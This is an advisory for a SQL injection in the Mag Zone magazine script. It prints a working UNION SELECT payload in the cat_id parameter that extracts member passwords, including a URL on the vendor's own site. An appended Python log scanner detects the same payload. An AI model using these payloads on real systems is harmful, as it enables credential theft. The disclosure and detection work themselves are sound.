Vendor: Mag Zone
By: Stack
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Mag Zone
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Vastal I-Tech Mag Zone SQL Injection Vulnerability
The Vastal I-Tech Mag Zone script is vulnerable to SQL injection through the cat_id parameter of view_mags.php. By supplying a specially crafted SQL query in that parameter, an attacker can gain access to the password of a user. The attacker can use the following URL to exploit the vulnerability:
http://site.il/view_mags.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)/**/FROM/**/members/*
A live demo of the exploit can be found at:
http://www.vastal.com/mag/view_mags.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)/**/FROM/**/members/*
Mitigation:
The vendor has released a patch to address the vulnerability. It is recommended to apply the patch as soon as possible.
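
Detection example (added here, not part of the original advisory or the vendor's code): a log check that flags requests to view_mags.php whose cat_id carries the UNION SELECT pattern described above, treating SQL comments such as /**/ as the whitespace they stand in for. The log lines are constructed samples, and the rule that a legitimate cat_id is a non-negative integer is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample request lines (not taken from any real log).
SAMPLE_REQUESTS = [
    "GET /view_mags.php?cat_id=4 HTTP/1.1",
    "GET /view_mags.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)"
    "/**/FROM/**/members/* HTTP/1.1",
    # The same kind of request as it appears when the client percent-encodes "/".
    "GET /view_mags.php?cat_id=-1%2F**%2FUNION%2F**%2FSELECT%2F**%2F1 HTTP/1.1",
    "GET /view_mags.php?cat_id=12&page=2 HTTP/1.1",
    # Only cat_id is inspected, so free text in another parameter is not flagged.
    "GET /view_mags.php?cat_id=7&q=student+union+select HTTP/1.1",
]

# Closed comments (/* ... */) and a trailing unterminated one (/* to end of value).
SQL_COMMENT = re.compile(r"/\*.*?\*/|/\*.*$", re.S)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)

def normalize(value):
    """Replace SQL comments with a space and collapse runs of whitespace."""
    return re.sub(r"\s+", " ", SQL_COMMENT.sub(" ", value)).strip()

def classify(request_line):
    """Return 'ok', 'non_integer' or 'union_select' for the cat_id of a
    view_mags.php request, or None when the line is not such a request."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return None
    url = urlsplit(parts[1])
    if not url.path.endswith("/view_mags.php"):
        return None
    values = parse_qs(url.query, keep_blank_values=True).get("cat_id")
    if values is None:
        return None
    verdict = "ok"
    for value in values:  # parse_qs has already percent-decoded each value
        if re.fullmatch(r"[0-9]+", value):
            continue  # assumption: a legitimate category id is a plain integer
        if UNION_SELECT.search(normalize(value)):
            return "union_select"
        verdict = "non_integer"
    return verdict

def scan(lines):
    """Return (line, verdict) pairs for every request that should be reviewed."""
    results = [(line, classify(line)) for line in lines]
    return [(line, v) for line, v in results if v not in (None, "ok")]

if __name__ == "__main__":
    for line, verdict in scan(SAMPLE_REQUESTS):
        print(verdict, line)
```

A "non_integer" verdict is worth reviewing even without a UNION SELECT match, since any non-numeric cat_id falls outside the assumed input range.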